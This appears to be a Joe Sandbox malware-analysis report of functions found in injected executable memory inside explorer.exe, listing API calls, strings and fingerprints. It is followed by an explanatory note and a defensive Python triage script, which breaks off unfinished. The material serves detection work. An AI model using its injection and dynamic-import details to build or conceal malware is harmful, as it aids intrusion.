                                                                                                            • String ID: S:(ML;;NW;;;LW)
                                                                                                            • API String ID: 173816248-495562761
                                                                                                            • Opcode ID: 79cb27a41e6bf29be1783338148c5806ad86ba6a150287ac79480d04f9847149
                                                                                                            • Instruction ID: 8625ad1bf0b07076f1fa6360d85a04184e43042b08e5176caf3836ee7d488285
                                                                                                            • Opcode Fuzzy Hash: 79cb27a41e6bf29be1783338148c5806ad86ba6a150287ac79480d04f9847149
                                                                                                            • Instruction Fuzzy Hash: EF111732208A8182E7108F50F95474BBBB0F3C1B98F600516EAC957A68CFBEC549CB40
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • RegGetValueW.KERNEL32 ref: 00E08F1A
                                                                                                            Strings
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00E08EBC
                                                                                                            • SOFTWARE\%s, xrefs: 00E08EC3
                                                                                                            • {C2FE454F-1649-4C34-B46D-B1EE64A366C2}, xrefs: 00E08F07
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Value_errno_invalid_parameter_noinfo
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C2FE454F-1649-4C34-B46D-B1EE64A366C2}
                                                                                                            • API String ID: 4005939669-3270428146
                                                                                                            • Opcode ID: 80dc20360ca16f8f9c1a7b532d2bfb9cb957c6a06b5e9ac06e7822a6ebdcd47e
                                                                                                            • Instruction ID: 5f97d169995f27db02743952ff15873a5c49d1ad1163f3bfdac06d46e0ff2ddb
                                                                                                            • Opcode Fuzzy Hash: 80dc20360ca16f8f9c1a7b532d2bfb9cb957c6a06b5e9ac06e7822a6ebdcd47e
                                                                                                            • Instruction Fuzzy Hash: F1F06D31218B8582EB20DB60F44439A7364F794394F901622E6DC537E8DFBDC249CB40
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$closesocketshutdown$CloseHandle$EnumEventsFreeLocalNetwork
                                                                                                            • String ID:
                                                                                                            • API String ID: 3044467104-0
                                                                                                            • Opcode ID: af6db72d22a5a0b57c07039f707cf0efc0dc65c97e2bfbca397b748c9bcfdb65
                                                                                                            • Instruction ID: 4fb43c19361f3fbad817b5fb026b12793c71a4befc5984853dcd8b4b3ce41504
                                                                                                            • Opcode Fuzzy Hash: af6db72d22a5a0b57c07039f707cf0efc0dc65c97e2bfbca397b748c9bcfdb65
                                                                                                            • Instruction Fuzzy Hash: 9E21B832159A94C6E7369B18F4897DAB3B1F79C749F241315C2CAA2A58CF7EC455CB00
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wait$ObjectSingleclosesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                                                            • String ID:
                                                                                                            • API String ID: 785092289-0
                                                                                                            • Opcode ID: 8f4642ff7b1716d754dccb156afb2504e9903691b47701658c058a50519b7d20
                                                                                                            • Instruction ID: 410246110c82fee292a429af6d6b7a4d594d7bed0348118c2a26c8760884f57a
                                                                                                            • Opcode Fuzzy Hash: 8f4642ff7b1716d754dccb156afb2504e9903691b47701658c058a50519b7d20
                                                                                                            • Instruction Fuzzy Hash: EC21B832159AD4C6E732AB18F8897DAB3B1F3DC749F241315C6CAA6A58CF7EC455CA00
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • RegGetValueW.KERNEL32 ref: 00E046E7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Value_errno_invalid_parameter_noinfo
                                                                                                            • String ID: SOFTWARE\%s${108D3252-20F0-4C1B-940D-6ED5366D8FD3}
                                                                                                            • API String ID: 4005939669-2357458413
                                                                                                            • Opcode ID: 2115ce6193abd41777d6ffd69be575b92e3f0452e2be5c5e42853abc2101455d
                                                                                                            • Instruction ID: b85647f6aa86d97d3abf9d8a5759a493f8550b2c28a4bc3a01784044b9b1da15
                                                                                                            • Opcode Fuzzy Hash: 2115ce6193abd41777d6ffd69be575b92e3f0452e2be5c5e42853abc2101455d
                                                                                                            • Instruction Fuzzy Hash: 82011972218BC1C6E760DB64F44478AB3A4F795344F905622E6CC63BA8DF7DC545CB40
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32 ref: 00E04880
                                                                                                              • Part of subcall function 00E04DA0: SHGetKnownFolderPath.SHELL32 ref: 00E04E23
                                                                                                            • LocalFree.KERNELBASE ref: 00E04BF3
                                                                                                              • Part of subcall function 00E04710: RegOpenKeyW.ADVAPI32 ref: 00E0474E
                                                                                                            • LocalFree.KERNEL32 ref: 00E04C72
                                                                                                            • WaitForSingleObject.KERNEL32 ref: 00E04CC6
                                                                                                            • LocalFree.KERNEL32 ref: 00E04D45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocal$FolderKnownObjectOpenPathSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 423962919-0
                                                                                                            • Opcode ID: 86a66c496532395c50701363ab02f81bfb15527b981d2ba53304625b2c98b4e8
                                                                                                            • Instruction ID: 6bee453cbd22a4007d06eabe55a3573cf27e03afad864b99689ef28204476576
                                                                                                            • Opcode Fuzzy Hash: 86a66c496532395c50701363ab02f81bfb15527b981d2ba53304625b2c98b4e8
                                                                                                            • Instruction Fuzzy Hash: F65107B6206B80C1FB24CF04F4D53A9A3A0F7E4748F51152AD64EAA7E4DBBDC585CB90
                                                                                                            APIs
                                                                                                            • _errno.LIBCMT ref: 00E32CDF
                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00E3064F,?,?,00000000,00E2AC17,?,?,00000000,00E2AC73,?,?,?,00E29403), ref: 00E32D13
                                                                                                            • _callnewh.LIBCMT ref: 00E32D2A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap_callnewh_errno
                                                                                                            • String ID:
                                                                                                            • API String ID: 849339952-0
                                                                                                            • Opcode ID: 4b04040313b4c59d8f4c6c08effb20606fd586f7079442bb8a48b4545a6d528d
                                                                                                            • Instruction ID: da1b85de809cc0a54026140d52fa850f4451e01cd9735568d819036755600c14
                                                                                                            • Opcode Fuzzy Hash: 4b04040313b4c59d8f4c6c08effb20606fd586f7079442bb8a48b4545a6d528d
                                                                                                            • Instruction Fuzzy Hash: 6E01B13170128085EF154B21EA48369AAA1ABA4BE8F58B6388F957B694EB3C8481C741
                                                                                                            APIs
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 1073023652-0
                                                                                                            • Opcode ID: 43dddbbfbda7011b3d8a65e8c8dbcf4d13a1a20bd968318ee48078ba41f9be42
                                                                                                            • Instruction ID: ed0763a0671a2f7c61c1af6324865f79b81b7c762c554046f55a0e7e538f9154
                                                                                                            • Opcode Fuzzy Hash: 43dddbbfbda7011b3d8a65e8c8dbcf4d13a1a20bd968318ee48078ba41f9be42
                                                                                                            • Instruction Fuzzy Hash: 6611873225AA84C6E732AB18F4897DAB370F39C749F241315D6C666A98CF7EC4558A00
                                                                                                            APIs
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 1073023652-0
                                                                                                            • Opcode ID: 235f50aebb46bc464f7ab05e66ccd8ccd191cfa8eb97216690ab7208fa9ce6f8
                                                                                                            • Instruction ID: ed0763a0671a2f7c61c1af6324865f79b81b7c762c554046f55a0e7e538f9154
                                                                                                            • Opcode Fuzzy Hash: 235f50aebb46bc464f7ab05e66ccd8ccd191cfa8eb97216690ab7208fa9ce6f8
                                                                                                            • Instruction Fuzzy Hash: 6611873225AA84C6E732AB18F4897DAB370F39C749F241315D6C666A98CF7EC4558A00
                                                                                                            APIs
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 1073023652-0
                                                                                                            • Opcode ID: cb8934eb4f7bc3a0db0905c1e506579420ed85087974290e892497e4c38a9e4d
                                                                                                            • Instruction ID: ed0763a0671a2f7c61c1af6324865f79b81b7c762c554046f55a0e7e538f9154
                                                                                                            • Opcode Fuzzy Hash: cb8934eb4f7bc3a0db0905c1e506579420ed85087974290e892497e4c38a9e4d
                                                                                                            • Instruction Fuzzy Hash: 6611873225AA84C6E732AB18F4897DAB370F39C749F241315D6C666A98CF7EC4558A00
                                                                                                            APIs
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: closesocketshutdown$CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 1073023652-0
                                                                                                            • Opcode ID: d07affa4af74ba9c6dc041e1d220e6f0941e94259047affa75eb072f7aa2d55e
                                                                                                            • Instruction ID: ed0763a0671a2f7c61c1af6324865f79b81b7c762c554046f55a0e7e538f9154
                                                                                                            • Opcode Fuzzy Hash: d07affa4af74ba9c6dc041e1d220e6f0941e94259047affa75eb072f7aa2d55e
                                                                                                            • Instruction Fuzzy Hash: 6611873225AA84C6E732AB18F4897DAB370F39C749F241315D6C666A98CF7EC4558A00
                                                                                                            APIs
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CreateInformationVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 3563531100-0
                                                                                                            • Opcode ID: e4348b458ff4f1f976adb9bc2e523157a452458e613d1e976ec5d4266348eb62
                                                                                                            • Instruction ID: 05319fdb2dc70cf08a3ac943464081b68462692762f9014ded866839c0eabb10
                                                                                                            • Opcode Fuzzy Hash: e4348b458ff4f1f976adb9bc2e523157a452458e613d1e976ec5d4266348eb62
                                                                                                            • Instruction Fuzzy Hash: D6E0DFB4611BD083FB845B14F849B5A2620FB9A785F902834F90A33764DF3CC98ACB04
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00E1218F
                                                                                                            • GetVolumeInformationW.KERNEL32 ref: 00E121E0
                                                                                                              • Part of subcall function 00E1DAD0: CryptAcquireContextW.ADVAPI32 ref: 00E1DB1E
                                                                                                              • Part of subcall function 00E1DAD0: CryptCreateHash.ADVAPI32 ref: 00E1DB47
                                                                                                              • Part of subcall function 00E1DAD0: WaitForSingleObject.KERNEL32 ref: 00E1DBB5
                                                                                                              • Part of subcall function 00E1DAD0: CryptReleaseContext.ADVAPI32 ref: 00E1DCA2
                                                                                                              • Part of subcall function 00E1DAD0: CryptDestroyHash.ADVAPI32 ref: 00E1DCB5
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$ContextHash$AcquireCreateDestroyDirectoryInformationObjectReleaseSingleSystemVolumeWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2609862481-0
                                                                                                            • Opcode ID: 13fdeda7c2e5c2250e802208b82858c93158c3d073d366ca9cf810559a951751
                                                                                                            • Instruction ID: ab274cbd0b5a372966ca42d5018040e5c39ec2c3df16e8ad32089a4326fe493d
                                                                                                            • Opcode Fuzzy Hash: 13fdeda7c2e5c2250e802208b82858c93158c3d073d366ca9cf810559a951751
                                                                                                            • Instruction Fuzzy Hash: E8119232228AC082E760CB60F88879F73A1F784744F90512AE789C7E58DB3EC588CB04
                                                                                                            APIs
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 181713994-0
                                                                                                            • Opcode ID: 02aa5fef786a4fb99182c43541bf79e51a5a4e61dda55fb9103a89aab660f712
                                                                                                            • Instruction ID: 261a4b0ff16a1922f9f278e028530080628fddd5452111a611802556c5203987
                                                                                                            • Opcode Fuzzy Hash: 02aa5fef786a4fb99182c43541bf79e51a5a4e61dda55fb9103a89aab660f712
                                                                                                            • Instruction Fuzzy Hash: 5A015E7218C280C7D634DB98E0443EEB360F385348F306226F696E3A26CB7DC8E58B41
                                                                                                            APIs
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 181713994-0
                                                                                                            • Opcode ID: f1e5726a2f09741b6e4c8e908db0c6a897dd3715062ec5dd15aeb9964fb7b25b
                                                                                                            • Instruction ID: 78ed5438bf42996953bbe5d658d2f3d3598839f847c88a36d19fb113b0bdfb86
                                                                                                            • Opcode Fuzzy Hash: f1e5726a2f09741b6e4c8e908db0c6a897dd3715062ec5dd15aeb9964fb7b25b
                                                                                                            • Instruction Fuzzy Hash: 6501403550C680CBD730AB58E014AEAB3B2F785B58F502626F7C662B58CB7DC5D48F41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: da2af1d5358e45a80c7f840fe45fc6962c5d488a89f3c32c77541c1115099bd7
                                                                                                            • Instruction ID: 34bea136e24079cd9ca2882cd827f2b56cc0ba5e4fc8844b509a27c98fb91980
                                                                                                            • Opcode Fuzzy Hash: da2af1d5358e45a80c7f840fe45fc6962c5d488a89f3c32c77541c1115099bd7
                                                                                                            • Instruction Fuzzy Hash: 1B0162F4214641D3F7109B24FE157A316A0E3A4348F602835D61AF62E0FB7DCAC98380
                                                                                                            APIs
                                                                                                            • GetProcAddressForCaller.KERNELBASE ref: 00E1998F
                                                                                                            • GetProcAddress.KERNEL32 ref: 00E199EE
                                                                                                            • LoadLibraryExW.KERNEL32 ref: 00E19A38
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$CallerLibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 3311809864-0
                                                                                                            • Opcode ID: 1f33e0d227f083223617d2c48e540e55c391f4ebc574c8c2512f086ed87e3818
                                                                                                            • Instruction ID: 91b5966f19b29a6cff71d9499aab62128c2e1852896f1c0060de646b3f01a6f2
                                                                                                            • Opcode Fuzzy Hash: 1f33e0d227f083223617d2c48e540e55c391f4ebc574c8c2512f086ed87e3818
                                                                                                            • Instruction Fuzzy Hash: 0401A276B18BC589DB30CB04E4A07AAB360F7C6744F805816D68E53A68DB3CD589CF42
                                                                                                            APIs
                                                                                                            • GetProcAddressForCaller.KERNELBASE ref: 00E18D4C
                                                                                                            • GetProcAddress.KERNEL32 ref: 00E18DAE
                                                                                                            • LoadLibraryW.KERNEL32 ref: 00E18DF8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$CallerLibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 3311809864-0
                                                                                                            • Opcode ID: 29f24ca8af7b1ec7b39b311e50dcf5f0945885a2f14febe62e27be05c9337b80
                                                                                                            • Instruction ID: 57cc68c922f2137fa51aad663c1dce808f37531c0e7a553a47cceefc2bd2b60d
                                                                                                            • Opcode Fuzzy Hash: 29f24ca8af7b1ec7b39b311e50dcf5f0945885a2f14febe62e27be05c9337b80
                                                                                                            • Instruction Fuzzy Hash: E7019036618BC58ADA70CB04E4D43AAB364F3D6744F801516D68E93A68DF39C589CB41
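The two functions above are dumped from committed, private, executable memory at 0xE00000 inside explorer.exe (process 16, per the snapshot file name) and resolve their imports at run time through GetProcAddressForCaller/GetProcAddress and LoadLibraryW/LoadLibraryExW, which is how an injected, manually mapped payload reaches the Win32 API without an import table. The script below is an added example, not code from Joe Sandbox or from the sample: it decodes the .sdmp names into PID, base address and memory attributes, pairs each "Source File" with the API calls listed above it, and flags functions that combine private executable memory with dynamic import resolution. The field layout of the .sdmp name (pid.phase.dump-id.base.protect.state.type.extra, all hex except the dump id) is an assumption read off the entries in this report; the Win32 constants are the documented winnt.h values; the sample input is constructed, its first two entries copied from this page and its third invented to show an image-backed region that should not be flagged.

```python
"""Triage helper for Joe Sandbox function entries (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field

# Win32 memory constants (documented winnt.h values).
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# APIs whose presence means the function resolves imports at run time.
DYNAMIC_RESOLVERS = {
    "GetProcAddress", "GetProcAddressForCaller",
    "LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
}

# ASSUMED layout of the .sdmp name, read off the entries in this report:
# <pid hex>.<phase hex>.<dump id dec>.<base hex>.<protect>.<state>.<type>.<extra>.sdmp
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$"
)
API_RE = re.compile(r"^(?:•\s*)?(\w+)\.(\w+) ref: ([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^(?:•\s*)?Source File: (\S+\.sdmp), Offset: ([0-9A-Fa-f]+)")


@dataclass
class Region:
    pid: int
    phase: int
    dump_id: int
    base: int
    protect: int
    state: int
    mem_type: int

    def is_exec(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    def is_private_exec(self) -> bool:
        # Committed executable memory not backed by a PE image on disk:
        # the footprint of a manually mapped or injected payload.
        return (self.is_exec() and bool(self.state & MEM_COMMIT)
                and bool(self.mem_type & MEM_PRIVATE) and not (self.mem_type & MEM_IMAGE))


def parse_sdmp(name: str) -> Region:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    return Region(pid=int(m["pid"], 16), phase=int(m["phase"], 16), dump_id=int(m["dump"]),
                  base=int(m["base"], 16), protect=int(m["protect"], 16),
                  state=int(m["state"], 16), mem_type=int(m["mtype"], 16))


@dataclass
class FunctionEntry:
    region: Region
    offset: int
    apis: list = field(default_factory=list)

    @property
    def dynamic_resolution(self) -> bool:
        return bool(set(self.apis) & DYNAMIC_RESOLVERS)

    @property
    def suspicious(self) -> bool:
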